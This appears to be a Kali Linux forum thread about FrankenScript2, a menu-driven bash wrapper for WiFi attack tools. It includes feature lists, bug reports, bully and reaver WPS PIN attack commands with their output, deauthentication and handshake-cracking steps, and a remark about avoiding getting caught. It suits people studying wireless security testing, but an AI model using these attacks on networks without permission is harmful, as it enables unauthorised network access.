Attack method - Two attacks are run at the same time (Same processing power but the chances of getting the passkey sooner are greater):
Attack 1 - Works through a wordlist from the beginning to the end.
Attack 2 - Works through a wordlist from the end to the beginning.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] = Passthrough Attack (Resumable).
Start a new attack option.
Easy capture file selection.
Configurable passkey's creation options.
Attack - Crunch Pyrit cowpatty.
Resume an attack.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[4] Script Launcher:
--------------------
Launch other scripts.
Scripts must be placed in the $HOME/FrankenScript2/Scripts folder.
Script file names can't contain any blank spaces or special characters.

[5] WiFi Adapter Override:
--------------------------
WiFi adapter selection, only available if multiple wifi adapters are present.

[6] System Mode Override:
-------------------------
Switch between "Networking Mode & Attack Mode".

[7] Recovered Passkey's:
------------------------
Displays all recovered passkeys.
Recovered passkey file: $HOME/FrankenScript2/Recovered-Passkeys.txt

[0] Exit FrankenScript2:
------------------------
Removes tempory files.
Disables attack mode and re-enables networking mode.
Exit the script.

Hello, I was very interested in using your script.
If you can not open it on my terminal. Only appears the message that "the file is binary and can not be opened" how do I open it?

I think it is because of the extension. "tar.gz" I can not open it.
give me an answer.
'm hanging on.

Sounds great slim, I'm looking forward to trying it out.

Have you considered putting the project on github?

You need to upack the tar.gz file

pmsl, do you really think it's good enough to put on github. lol

Here's the latest FrankenScript.
FrankenScript2: Updated 14/7/14

FrankenScript2_Updated-14-7-2014.tar.gz
http://mir.cr/0LY66HZC

[1] Scan And Attack AP's:
-------------------------
Auto check/auto enable monitor mode function.
MAC address spoofing options.
Kill processes options (airmon-ng check kill).
Network scanners - wash & airodump-ng combined.
Sort displayed scan results by Signal Strength, Attack Method, or Orignally Displayed.
Default access point WEP/WPA passkey generators.
WEP Attacks - Aircrack Tools.
WPA/WPA2 Attacks - Aircrack Tools.
WPS Attacks - Reaver & Bully & Default WPS-Pin generators.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] Return To Scanned AP's:
---------------------------
Returns you to the last network scan.

[3] Attack Handshake.cap Files:
-------------------------------
[1] = Wordlist + Pyrit + Cowpatty (Non-Resumable).
Simple capture file presentation & selection.
Drag & drop a wordlist onto the screen, or manually input the path and file name.
Attack method - Two attacks are run at the same time (Same processing power but the chances of getting the passkey sooner are greater):
Attack 1 - Works through a wordlist from the beginning to the end.
Attack 2 - Works through a wordlist from the end to the beginning.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] = Passthrough Attack (Resumable).
Start a new attack option.
Easy capture file selection.
Configurable passkey's creation options.
Attack - Crunch Pyrit cowpatty.
Resume an attack.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[4] Script Launcher:
--------------------
Launch other scripts.
Scripts must be placed in the $HOME/FrankenScript2/Scripts folder.
Script file names can't contain any blank spaces or special characters.

[5] WiFi Adapter Override:
--------------------------
WiFi adapter selection, only available if multiple wifi adapters are present.

[6] System Mode Override:
-------------------------
Switch between "Networking Mode & Attack Mode".

[7] Recovered Passkey's:
------------------------
Displays all recovered passkeys.
Recovered passkey file: $HOME/FrankenScript2/Recovered-Passkeys.txt

[0] Exit FrankenScript2:
------------------------
Removes tempory files.
Disables attack mode and re-enables networking mode.
Exit the script.

pmsl, do you really think it's good enough to put on github. lol

Is it sad I had to google pmsl?

That being said, I've seen some rubbish on github
To start, your script actually works ☺ that's a step up from a lot of projects.

It would make It easy to report issues and such if they come up.

Is it sad I had to google pmsl?

That being said, I've seen some rubbish on github
To start, your script actually works ☺ that's a step up from a lot of projects.

It would make It easy to report issues and such if they come up.

I'm greatful for your support matey and glad you found it useful.

Apologies for the pmsl, In my defence I was texting my girlfriend at the same time .
It was never really intended for public use, but I shared it here to try and give back to the community.

Good job slim!!

I'm messing with it now, and here are my observations..


[4] Script Launcher:
Thank you!! It works.



ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option:
oh really? ;)



Scanned_APs
===========

30: ...

1: ...

[r] = Re-Scan
[e] = Sort By - ESSID (AP Name)
[s] = Sort By - Signal Strength
[a] = Sort By - Attack Method
[0] = Return To Main Menu
Please choose an option or input the number of a target:
that's cool! Are those new options?


I'm getting this message. That is most likely from my end. Will reinstall and check-in later.

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option: xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Check.txt: 17:File exists




EDIT:

removed FS2 from Home, re-downloaded it and re-installed and I get this message just before a wep attack:


Starting Fragment
xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Aireplay_Fragment_Check.txt: 17:File exists but it proceeds with the attack normally(?)


on wpa also...

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option: xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Check.txt: 17:File exists





Can anyone else reproduce these messages/problems on their setup please?

Hey quest, did you happen to close the script with control + c and not exit using the option on the menu?

From what I read in the script, it cleans temp files on exit. That would explain your file exists error

These syntaxes in FS2 when starting Bully , are not getting me anywhere, and they crash Bully back to the attack options...

Option [1] = Bully & WPS Default Pin.

Bully & WPS-Pin Attack Command:
bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -p 3333 -F -B -l 60 -v 3

Press [Enter] to launch the attack.

And option [2] = Bully Basic Attack.

Bully Basic Attack Command:
bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -F -l 60 -v 3

Press [Enter] to launch the attack.


I've tried these commands directly in Bully to see what the problem was with these syntaxes and here is the return:


root@kali:~# bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -p 3333 -F -B -l 60 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[X] Unable to get a beacon from the AP, possible causes are
[.] an invalid --bssid or -essid was provided,
[.] the access point isn't on channel '6',
[.] you aren't close enough to the access point.
root@kali:~#



root@kali:~# bully mon0 -b 84:C9:B2:XX:XX:XX -c X -e Xxxxx -F -l 60 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[X] Unable to get a beacon from the AP, possible causes are
[.] an invalid --bssid or -essid was provided,
[.] the access point isn't on channel '6',
[.] you aren't close enough to the access point.
root@kali:~#



Now to confirm that it is possible to attack that same target with a simple syntax...


root@kali:~# bully mon0 -c X -b 84:C9:B2:XX:XX:XX -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[+] Got beacon for 'Xxxx wi-fi' (84:c9:b2:0a:e1:22)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/84c9b20ae122.run'
[+] Index of starting pin number is '0023000'
[+] Last State = 'NoAssoc' Next pin '71092997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '18102994'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '24942997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '20102999'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '07132995'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '58762998'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '38872990'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '21282997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '98162994'
^C
Saved session to '/root/.bully/84c9b20ae122.run'
root@kali:~#

Hey quest, did you happen to close the script with control + c and not exit using the option on the menu?

From what I read in the script, it cleans temp files on exit. That would explain your file exists error

ah yes that is a possibility! Great if it's on my end :) Good catch friend!

These syntaxes in FS2 when starting Bully , are not getting me anywhere, and they crash Bully back to the attack options...

Option [1] = Bully & WPS Default Pin.


And option [2] = Bully Basic Attack.


I've tried these commands directly in Bully to see what the problem was with these syntaxes and here is the return:







Now to confirm that it is possible to attack that same target with a simple syntax...

I can not understand this script. I open it, choose the first option it opens the wash and get an error message appears, claiming a missing file ".txt".

What do I do? I need help!

I can not understand this script. I open it, choose the first option it opens the wash and get an error message appears, claiming a missing file ".txt".

What do I do? I need help!

Hey there, please post the entire error message.

Hey there, please post the entire error message.

This is my error..
I select the first option to search after and then he opens the wash and displays the second screen.

I want to remember who are usuando a wireless card in my notebook for this.

http://uploaddeimagens.com.br/images/000/311/571/original/print1.png?1405476429

http://uploaddeimagens.com.br/images/000/311/574/original/print2.png?1405476536

Help me!

This is my error..
I select the first option to search after and then he opens the wash and displays the second screen.

I want to remember who are usuando a wireless card in my notebook for this.

http://uploaddeimagens.com.br/images/000/311/571/original/print1.png?1405476429

http://uploaddeimagens.com.br/images/000/311/574/original/print2.png?1405476536

Help me!

Looks to me that you're running the script from a folder on your desktop. You need to put the folder in your home directory.

@ Quest,
The file error message is because a file didn't get deleted, I think I've solved the issue now.
I've only used bully a couple of times but those commands worked for me ok, I'll look into it but please can you post all the bully commands that work for you.

@ caiiostylle,
Try what staticn0de suggested, if that doesn't work then please post the error message in english so I can try to help you.

I'll post the updated version soon.

sure thing bro,

I'm not a Bully expert and I wish there was more feedback on that subject, but the few times I've used it, those below, worked great on any AP anywhere, anytime...

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v 3
bully Interface -Chanel -BSSID -verbosity 3

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v 3 -p XXXX
bully Interface -Chanel -BSSID -verbosity 3 -PIN

"easy does it" as they say :D

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[3] = Return To Scanned APs.
Please choose an option: xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Check.txt: 17:File exists

if you can get those fixed also ;)

also, the way you have FS2 raped up in folders (root/Desktop/Untitled Folder/FrankenScript2) is not practical me thinks. It was better before. I could just decompress it Home.

also, the way you have FS2 raped up in folders (root/Desktop/Untitled Folder/FrankenScript2) is not practical me thinks. It was better before. I could just decompress it Home.

I don't understand what you mean when you said "(root/Desktop/Untitled Folder/FrankenScript2)", FrankenScript shouldn't be in that location.
FrankenScript should be unpacked to your Home folder and not the Desktop.

The way the tar.gz is packaged. It is wrapped in many 'parent' folders before the FrankenScript2 folder.

So when I uncompress it I have a "root" folder, inside that a "Desktop" folder, inside that a "Untitled Folder" folder, then finally I get the "FrankenScript2" folder.


FrankenScript2_Updated-14-7-2014.tar.gz\root\Desktop\Untitled Folder - TAR+GZIP archive, unpacked size 2*401*208 bytes 1,04*Mb (1*091*590)

I used winrar4.0 and ark under Kali. I've DL the archive 3 times now with the same results. I doubt that I'm the only one getting that result.

My FrankenScript2 folder is indeed in my Home directory. I have that part figured out by now :p

Also...

it might just be me lucking out, but I'm not getting anywhere with that version of FS2, no matter what I try.

No handshakes. No wep success. Nada. Keeps sending out packets endlessly. It does associate, but that's the extent of it. I had all kinds of success with the previous version.

That might be on my end though(?)

Also...

it might just be me lucking out, but I'm not getting anywhere with that version of FS2, no matter what I try.

No handshakes. No wep success. Nada. Keeps sending out packets endlessly. It does associate, but that's the extent of it. I had all kinds of success with the previous version.

That might be on my end though(?)

That's really odd cause everything works for me, Can anyone else confirm the same issue's please?.
I'll be uploading another updated version within the next day or two, you can try the new version or I'll help you fix the current version.

I have the same thing with the unpack. A tar xvf lands the directory in an untitled folder on my desktop. It did not matter I had the archive and run the extract from my home folder.

The script itself works fine for me though. I am able to capture handshakes, use bully and reaver no problems. Haven't tripped a WEP attack yet.

I was also able to brute force with word list.

Have you considered adding support for cudahashcat? If not, I'll give it a crack on the weekend.

No major issues as of yet with the script. I had the same as quest where I didn't close the script correctly. I added a line to clear temp on load and that fixed it.

I have the same thing with the unpack. A tar xvf lands the directory in an untitled folder on my desktop. It did not matter I had the archive and run the extract from my home folder.

The script itself works fine for me though. I am able to capture handshakes, use bully and reaver no problems. Haven't tripped a WEP attack yet.

I was also able to brute force with word list.

Have you considered adding support for cudahashcat? If not, I'll give it a crack on the weekend.

No major issues as of yet with the script. I had the same as quest where I didn't close the script correctly. I added a line to clear temp on load and that fixed it.

Most grateful for your feedback and glad to hear it all works for you.
I was thinking about adding cudahashcat but I always seem to get side tracked by something else, I'll probably add it when I've got bully working properly.

Most grateful for your feedback and glad to hear it all works for you.
I was thinking about adding cudahashcat but I always seem to get side tracked by something else, I'll probably add it when I've got bully working properly.

Realized unpack the file in the home folder, it creates a directory on my desktop that does not appear.

when I go to the root folder against the FS2 within the root folder. I try to open the file, I can open it using the 'bash' command. When I select the first option and I select my wireless network card, it opens a window 'wash' and the message appears.

xterm: connot open / root/FrankenScript2/Temp_Working_Directory/Wash_Network_Scan.txt: 2

slim, once you've uploaded the new version, I will write a howto for it, whether you like it or not.

xD

slim, once you've uploaded the new version, I will write a howto for it, whether you like it or not.

xD

Ok kool, I've decided to make some more changes to FrankenScript2 so the upload will be a little delayed.

Here's the latest FrankenScript.
FrankenScript2: Updated 18/7/14

http://mir.cr/0QHRHOHT

Hi Slim,

Not a problem, just a comment. Publishing the script in a rar seems to have removed file permissions (the x flag has been cleared with 0644) and the rar file does not extract to it's own folder anymore.

yeah, slim, now the files are loose inside the archive. No FrankenScript2 folder!

I just read this whole thread today, then downloaded. Everyone knows already, but I'll say it anyway... Great Work!

Also, same here. I unrar-ed to find multiple scripts and whatnot floating around.

Thanks for letting me know guy's and sorry about that, I've just repacked it again and hopefully all should be good this time around.

FrankenScript2_Updated-19-7-2014.tar.gz
http://mir.cr/1UNMCFAJ

Just so your guys know, if you extract the archive with unrar x FrankenScript.rar is placed the files in folders. Still have to chmod the scripts through. Thanks for uploading as the tar.gz we all know and love!

Thanks slim!!

Here are my observations..

- Decompress normally in "FrankenScript2" folder.

- Starts normally with "cd /root/FrankenScript2 && ./FrankenScript2.sh"

-
[1] = Full iw-dev Scan
[2] = Wash WPS Network Scan.
[3] = Airodump Network Scan.
Please choose an option: I like that!!!



- Option 1 ([1] = Full iw-dev Scan) does not work for me. The return...

Scanned_APs
===========



################################################## ##########################
# [f] = Re-Scan - Full iw-dev Scan # [e] = Sort Scan By - ESSID #
# [w] = Re-Scan - Wash WPS Network Scan # [a] = Sort Scan By - Encryption #
# [d] = Re-Scan - Airodump Network Scan # [0] = Return To Main Menu #
# # [q] = Exit FrankenScript #
################################################## ##########################

Please choose an option or input the number of a target:

- Dude...

ATTACK METHOD - HANDSHAKE CAPTURE
#################################

NOTE: Wait for clients to be visable in airodump before entering option [2].

[1] = Deauthenticate all connected clients.
[2] = Deauthenticate a specific client.
[0] = Return To Scanned APs.
[q] = Exit FrankenScript
Please choose an option:
xD



Bully

- big improvements. All option working. But...


[3] = Bully Custom Attack.

Bully Current Attack Command:
bully mon0 -c 6 -b 84:C9:B2:0A:E1:22 3 <---I'm not going to tell ya what is missing here ..wink

Please input any additional Bully options:


- Is it possible that FS2 messes with network manager? I loose my connection on wlan0. Anyone having the same?
Maybe I choose option 1 (killing all processes) but I don't think I did...



That's it for now. :)

@ Quest,

Try this:
1) Close FrankenScript using the [q] option, then close the terminal window.
2) Restart FrankenScript and select option [1] from the main menu, then choose option "[1] = airmon-ng check kill".
3) Choose any mac address option and then retry the "[1] = Full iw-dev Scan" again.

I've fixed the custom bully attack options, I've also added some more return to options and fixed an issue with the handshake capture attack.
I'll probably upload it within the next few days.

I would of answered you sooner but, I did exactly as above and as a result..


Scanned_APs
===========



################################################## ##########################
# [f] = Re-Scan - Full iw-dev Scan # [e] = Sort Scan By - ESSID #
# [w] = Re-Scan - Wash WPS Network Scan # [a] = Sort Scan By - Encryption #
# [d] = Re-Scan - Airodump Network Scan # [0] = Return To Main Menu #
# # [q] = Exit FrankenScript #
################################################## ##########################

Please choose an option or input the number of a target:



so it's the same as before, but option 1 ("[1] = airmon-ng check kill") has killed my network manager so I had to reboot my computer, thank you very much..

R&D.. :cool:

I would of answered you sooner but, I did exactly as above and as a result..



so it's the same as before, but option 1 ("[1] = airmon-ng check kill") has killed my network manager so I had to reboot my computer, thank you very much..

R&D.. :cool:

It was mean't to kill network manager, and you didn't need to restart your computer. LOL
Network manager would have been restarted if you used the [q] option or if you re-enabled networking mode using option [6] from the main menu. LOL

What does R&D.. mean?.

Research and Development

a little more testing...



exiting with [q] does restart the network manager! That's what I did before with a different result!? Weird.




[1] = Full iw-dev Scan, still not working for me. But [2] = Wash WPS Network Scan. and [3] = Airodump Network Scan. both work.

# [f] = Re-Scan - Full iw-dev Scan, does not scan, but only shows previously scanned Airodump networks.




something strange happens when i use FS2, and surf(even after FS2 is closed with q). I cannot connect to web sites, even if the network manager shows that I'm still connected, or sometimes it kills wlan0, and I have to shut down/restart network manager for my wifi adapter(wlan0) to be visible again. I never use the same wifi adapter to surf and pen test. I always separate things. So wlan0 is connected on the web and wlan1 is testing. It happens when I start FS2. It happens everytime time.






Handshakes


Checking for a captured handshake in 5 seconds...
ERROR: could not insert 'nvidia': No such device
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file '/root/FrankenScript2/Temp_Working_Dirctory/psk-01.cap' (1/1)...
Parsed 37 packets (37 802.11-packets), got 2 AP(s)

#1: AccessPoint a4:...



New pcap-file '/root/FrankenScript2/Temp_Working_Dirctory/Stripped.cap' written (22 out of 37 packets)
ERROR: could not insert 'nvidia': No such device

Valid handshake detected, XXXXX.cap will be coppied to FrankenScript2/Captured_Handshakes

Press [Enter] to continue.





[3] Attack Handshake Files

does not show me the .cap file captured above, and it is there in /root/FrankenScript2/Captured_Handshakes





Please input the number of your chosen capture file:
./FrankenScript2.sh: line 2381: /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Cracking/Handshake_File.txt: No such file or directory
cat: /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Cracking/Chosen_capture_file.txt: No such file or directory

Drag and drop the wordlist onto this screen:





Drag and drop the wordlist onto this screen: '/root/FrankenScript2/Captured_Handshakes/MARIA.cap'

NOTE: If the passkey is found there will be a long wait before the xterm windows close automatically.
Recovered passkeys will be stored in /root/FrankenScript2/Recovered-Passkeys.txt

Press [Enter] to continue.



Then 2 windows open saying the same thing, wich I could not copy paste.

ERROR: could not insert 'nvidia': No such device

To fix the capture files not being displayed issue do the following:
Browse to root/FrankenScript/Temp_Working_Dirctory, then rename the folder inside the Temp_Working_Dirctory to Handshake_Cracking.

In regards to the iw dev scan issue and the browsing while using FrankenScript issue:

1) Network Manager and other processes can sometimes cause issue's while using the aircrack tools, so these processes sometimes need to be killed berfore attempting an attack.

FrankenScript has kill processes options:
a) airmon-check-kill = Automatically kills all troublesome processes Network Manager included (So no browsing the internet while Attack Mode is enabled).
b) Proceed without killing any processes = Can cause issue's while trying to perform some attacks.

Hi Slim,

I will try that.

You have a feedback in the Howto that I started https://forums.kali.org/showthread.php?22087-Howto-frankenScript&p=35619#post35619 form Defaultzero

I will start a Problems/Solutions collection in the first post, so you won't have to answer the same questions all the time.

I really like your script. However, I read somewhere this will reboot locked routers with MDK3. I can't find an option for that. Is it supported?

I really like your script. However, I read somewhere this will reboot locked routers with MDK3. I can't find an option for that. Is it supported?

It did have that feature but it doesn't anymore.

I'm not sure if you're pentesting your own private network or trying to gain access to someone elses network, or if its work related but heres a little advise.
Don't try to reset any access points if stealth is an issue, using the access point reset attacks will seriously increase the chance of getting caught.

No, just Pen testing. Just curious, but why was that feature removed? Most routers I test nowadays can't be cracked without resetting the router.

No, just Pen testing. Just curious, but why was that feature removed? Most routers I test nowadays can't be cracked without resetting the router.

I'll probably add it to FrankenScript again at some point.

RChadwick, since FS has the option to start other scripts, you can add ReVdk3 in the 'scripts' folder.

https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode


Atrophy is a basic program that uses MDK3 to attempt to reboot routers (helpful when trying to unlock WPS.) The program uses Authentication flood, Michael Integrity Check failure, beacon flood, and deauthentication (a few others too depending on your configuration.)

ReVdk3 is a similar program to Atrophy, but it uses a different approach to attack an access point. It uses EAPOL start and stop attacks to attempt to reboot the router.

Frankenscript 2 is a full blown program that offers a wide range of tools to attack access points. You can find more info here. (https://forums.kali.org/showthread.php?19913-FrankenScript-by-Slim76-It-Attacks-Access-Points-and-pcap-files)

I have no idea how it works though.

for the empty Temp_Working_Dirctory folder problem...

Deferences between versions upon exiting:

FrankenScript2-10-06-2014.tar.gz

[ ok ] Starting network connection manager: NetworkManager already started.

Cleaned Temp Folder
root@kali:~/FrankenScript2#


FrankenScript2_Updated-19-7-2014.tar.gz

[ ok ] Starting network connection manager: NetworkManager already started.
root@kali:~/FrankenScript2#

Hi slim76 and Quest;

First thanks for the .deb and the hardwork. I am new and learning cracking as a hobby.

I managed to obtain a valid WPA handshake from my home router, however I am unable to crack it using:

# [2] = Attack using hashcat
# [3] = Attack using oclhashcat
# [4] = Attack using cudahashcat

I keep getting errors the following errors when trying to crack it.

Please input the number of your chosen capture file: 1
cp: cannot overwrite non-directory `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking' with directory `/usr/share/FS3/Captured_Handshakes/FIBREOP879'
cp: cannot stat `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/FIBREOP879/AP_Name.txt': Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cp: accessing `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/': Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 45: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//essid.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//bssid.txt: Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 151: Edit: command not found
grep: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Wordlist_Attack.txt: Not a directory

I installed the latest version and read the entire thread to configure it properly, however I cannot crack the capture.

Any ideas?

Thanks in advance.

Hi jar!

You got me completely mystified... What do you mean by

# [2] = Attack using hashcat
# [3] = Attack using oclhashcat
# [4] = Attack using cudahashcat
:confused:

ocl/cuda/Hashcat are not in FS yet. Are you a time traveler?

Posting in an old thread about something that will happen in the future? Am i slowly loosing my mind here?

Hi Quest,

I am using fs3.sh/.deb from post #1 from slim76. When I choose the option to Attack Handshake Capture Files, I am presented with the above options and I attached a image. I just searched the code and there is no reference to ocl/cuda/Hashcat. So it's merely options that will be implemented in the future, hence why I am getting the errors.

Is there a newer post/site regarding fs3?

Thanks again,

jar

413

lol, i see these options now...

You got FS3 from the new thread https://forums.kali.org/showthread.php?22087-Howto-frankenScript

Then this thread was unlocked and moved here from "Kali Linux General Use" forum.

Then you posted in this thread about ghost options that I had not idea about.

:eek:

Hi slim76 and Quest;

First thanks for the .deb and the hardwork. I am new and learning cracking as a hobby.

I managed to obtain a valid WPA handshake from my home router, however I am unable to crack it using:

# [2] = Attack using hashcat
# [3] = Attack using oclhashcat
# [4] = Attack using cudahashcat

I keep getting errors the following errors when trying to crack it.

Please input the number of your chosen capture file: 1
cp: cannot overwrite non-directory `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking' with directory `/usr/share/FS3/Captured_Handshakes/FIBREOP879'
cp: cannot stat `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/FIBREOP879/AP_Name.txt': Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cp: accessing `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/': Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 45: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//essid.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//bssid.txt: Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 151: Edit: command not found
grep: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Wordlist_Attack.txt: Not a directory

I installed the latest version and read the entire thread to configure it properly, however I cannot crack the capture.

Any ideas?

Thanks in advance.

Sorry but those options dont work yet, I only put them there because staticn0de said he would write the attacks for those options.
I think I might have to write the attacks by myself, but my Nvidia card has just died and I don't know when I'll be getting another cuda supported card. :-(

If there's anyone from north london that has any spare cuda supported cards that they dont want it would be most helpful. LOL

I think staticn0de is busy.

Yes, I thought your rig face planted! My Jedi skills are improving

That sucks.

I think staticn0de is busy.

Yes, I thought your rig face planted! My Jedi skills are improving

That sucks.

I knew the card had problems before I set it up, it did work intermittently for a while but now it has died completely. lol

used video cards are easy to get. Most gamers have 2 or 3

Check your local ads/web market.

Actually if you can play it by ear, I can test.

used video cards are easy to get. Most gamers have 2 or 3

Check your local ads/web market.

Actually if you can play it by ear, I can test.

I think you doing the testing for me might be the only option.
I can't really afford to buy another card at the moment as I have health issue's and I'm not currently working, plus its nearly christmas and I need every penny I can get. :-(

yes and jar can test also for cuda/Hashcat, since he's one step ahead of me to find special options ;)

We need a volunteer that has ATi/stream to test ocl/Hashcat though.

For your health issues, I've been listening to independent researchers for years. I might have a trick or two for ya ...

yes and jar can test also for cuda/Hashcat, since he's one step ahead of me to find special options ;)

We need a volunteer that has ATi/stream to test ocl/Hashcat though.

For your health issues, I've been listening to independent researchers for years. I might have a trick or two for ya ...

Let me get cuda/Hashcat sorted first lol, then I'll move on to ocl/Hashcat.

I'm still alive so my health issue's are not that bad anymore lol, anyway lets keep to the topic or we might cause problems with the thread ;-).
Cheers anyway matey.

Here's the latest FrankenScript.

FrankenScript_Portable.26.April.2015.tar.gz
https://www.mirrorcreator.com/files/1W7QPQQW/FrankenScript_Portable.26.April.2015.tar.gz_links

Had trouble downloading it. The first biggest link lead to FrankenScript_Portable.26.April.2015.tar.gz.exe.
Kali tried to load wine when I double clicked it.
I should have known im looking for a *.sh file

Anyway finally found a link to FrankenScript_Portable.26.April.2015.tar.gz, that worked. Nice touch to add the necessary programs with the download. Well implemented script. Luv the layout and approach.

I may be doing something wrong. This is what happened:


MAC address for wlan2:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

MAC address for mon0:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

Target Details: "HAR0000000" 00:00:00:7D:B6:D0

Possible WPS Pins: 82388003 57952154 82109011 65949474

[1] = Reaver.t6x + Pixiewps (Fixed Arguments)
[2] = Reaver + Pin Generators (Fixed Arguments)
[3] = Reaver (Fixed Arguments)
[4] = Reaver + Pin Generators (Custom Arguments)
[5] = Custom Attack
[p] = Proceed To Attack The Next Target

Please choose an option:

Picked 2

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:00:00:7D:B6:D0
[+] Associated with 00:00:00:7D:B6:D0 (ESSID: We hear you 0000000000)
[+] Trying pin 82109011
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:58:36:c7:b0:f2:74:ee:23:21:f2:5e:a5:b1:b4:46
